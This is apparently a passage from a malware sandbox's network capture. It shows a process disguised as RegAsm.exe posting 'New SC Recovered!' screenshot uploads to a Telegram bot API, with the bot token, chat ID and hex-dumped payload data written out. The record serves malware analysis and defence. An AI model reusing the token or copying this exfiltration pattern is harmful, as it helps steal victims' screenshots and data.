                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 9f 13 ff 00 c8 df 71 fe e2 7f e8 22 bd 1a bc e7 c4 ff 00 f2 37 dc 7f b8 9f fa 08 ae ac 27 f1 51 c5 8e fe 03 2a d1 45 15 ee 9f 32 14 51 45 03 0a 28 a2 80 0a 4a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 00 94 51 45 30 0a 28 a4 a0 62 d2 51 45 00 14 51 45 00 14 94 b4 94 c6 14 51 45 00 14 51 49 40 0b 49 4b 49 40 05 14 51 4c 62 51 45 14 00 51 45 14 00 52 51 45 00 14 51 45 31 85 14 51 40 05 25 2d 25 00 28 ea 2b 4e 7f f5 c7 f0 fe 55 97 de b4 e6 ff 00 5a 7e 83 f9 56 52 dd 0d 6e 32 8a 29 33 41 42 d1 49 45 00 2d 25 14 50 01 45 14 53 18 52 52 d1 40 09 45 14 50 01 41 a2 8a 00 6c bf f1 ed 37 fb bf d6 ab d9 ff 00 ac 6f a5 58 97 fe 3d e6 ff 00 77 fa d5 7b 3f f5 8d f4 a6 b6 60 5a a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 c5 a2 92 8a 00 5a 29 28 a0 42 d1 45 14 00 51
                                                Data Ascii: q"7'Q*E2QE(J(((QEQE0(bQEQEQEQI@IKI@QLbQEQERQEQE1Q@%-%(+NUZ~VRn2)3ABIE-%PESRR@EPAl7oX=w{?`Z)QEQERQ@Z)(BEQ
                                                2024-05-24 05:43:38 UTC | 15447 | OUT | Data Raw: 4a 00 eb 28 a3 22 8c d4 1e 09 ab e1 df f8 ff 00 93 fe b9 1f e6 2b 7a e0 fe e5 bf 0f e7 5c d6 8f 77 1d ad e1 69 49 0a cb b7 3e 9c 8f f0 ad ad 52 e8 41 68 92 a8 0e 19 c0 18 3e c6 be 67 34 a3 52 78 94 a2 b7 5a 1f 53 95 56 a7 4f 0a dc 9e cf 51 e9 53 2f 23 07 91 58 6b ad 63 fe 5d ff 00 f1 ff 00 fe b5 48 35 ec 7f cb b7 fe 3f ff 00 d6 ae 25 95 e2 ff 00 93 f1 5f e6 76 3c d7 09 fc ff 00 83 ff 00 23 1e 93 8a 4a 2b ec cf 8a b0 b9 14 66 92 8a 00 5c d6 3d f7 17 ae 48 cf 4e bd f8 ad 7a 47 fb 8d f4 ae 6c 55 1f 6d 4e d7 b5 b5 37 c3 cf 92 7e ba 15 a6 f1 05 ec b7 96 97 2a 22 8b ec 83 6c 51 c6 08 40 3b f1 9e e3 8a a5 7d 74 fa 85 f4 97 0d 14 69 24 a7 25 62 04 02 7e 84 9e b5 eb b4 57 81 ca 7d 2b c3 37 bc 8c d9 b4 2d 32 7d 48 6a 32 db 6e ba 0c ae 24 de c3 95 c6 38 ce 3b 0a 4d
                                                Data Ascii: J("+z\wiI>RAh>g4RxZSVOQS/#Xkc]H5?%_v<#J+f\=HNzGlUmN7~*"lQ@;}ti$%b~W}+7-2}Hj2n$8;M
                                                2024-05-24 05:43:38 UTC | 5117 | OUT | Data Raw: d4 bf bd f8 1d 75 25 72 54 51 f5 ef ee fe 3f f0 03 ea 7f de fc 0e b6 92 b9 3a 28 fa f7 f7 7f 1f f8 03 fa 9f f7 bf 03 ac a2 b9 3a 28 fa f7 f7 7f 1f f8 01 f5 3f ef 7e 07 57 45 72 94 51 f5 ef ee fe 3f f0 03 ea 7f de fc 0e a8 d1 5c ad 14 7d 7b fb bf 8f fc 01 fd 4f fb df 81 d5 52 57 2d 45 1f 5e fe ef e3 ff 00 00 3e a9 fd e3 a9 a4 ae 5a 8a 3e bd fd df c7 fe 00 7d 53 fb c7 53 49 5c bd 14 7d 7b fb bf 8f fc 01 fd 53 cc ea 28 ae 5e 8a 3e bd fd df c7 fe 00 7d 53 cc e9 e8 35 cc 00 49 c0 19 35 7e 4d 13 57 89 d1 24 d2 af 51 a4 ce c0 d6 ee 0b 60 64 e3 8e 78 a3 eb df dd fc 7f e0 07 d5 3c cd 8a 2b 9b 58 65 68 5e 65 89 cc 48 40 67 0a 76 a9 3d 01 3e f8 35 3d c6 9b 7f 6b 6e 97 17 36 37 30 c2 f8 db 24 91 32 ab 67 91 82 46 0d 1f 5e fe ef e3 ff 00 00 7f 55 f3 37 28 ae 66 8a 3e
                                                Data Ascii: u%rTQ?:(:(?~WErQ?\}{ORW-E^>Z>}SSI\}{S(^>}S5I5~MW$Q`dx<+Xeh^eH@gv=>5=kn670$2gF^U7(f>
                                                2024-05-24 05:43:38 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 61 31 32 63 30 32 66 30 37 35 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9a12c02f0750--
                                                2024-05-24 05:43:39 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:38 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.7 | 49712 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:43:39 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9c148a05a466
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:39 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:43:39 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 34 2f 32 30 32 34 20 31 30 3a 32 32 3a 30 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9c148a05a466Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9c148a05a466Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/04/2024 10:22:00User
                                                2024-05-24 05:43:39 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:39 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:39 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:39 UTC | 15447 | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:39 UTC | 1165 | OUT | Data Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:39 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9c148a05a466--
                                                2024-05-24 05:43:39 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:39 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.7 | 49713 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:43:42 UTC | 238 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9ece9c66b2c0
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                2024-05-24 05:43:42 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 37 2f 32 30 32 34 20 32 31 3a 33 38 3a 35 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9ece9c66b2c0Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9ece9c66b2c0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/07/2024 21:38:53User
                                                2024-05-24 05:43:42 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:42 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:42 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:42 UTC | 15447 | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:42 UTC | 1165 | OUT | Data Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:42 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9ece9c66b2c0--
                                                2024-05-24 05:43:42 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:43:43 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:42 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.7 | 49714 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:43:57 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca51c7ada008a
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:57 UTC | 25 | IN | HTTP/1.1 100 Continue
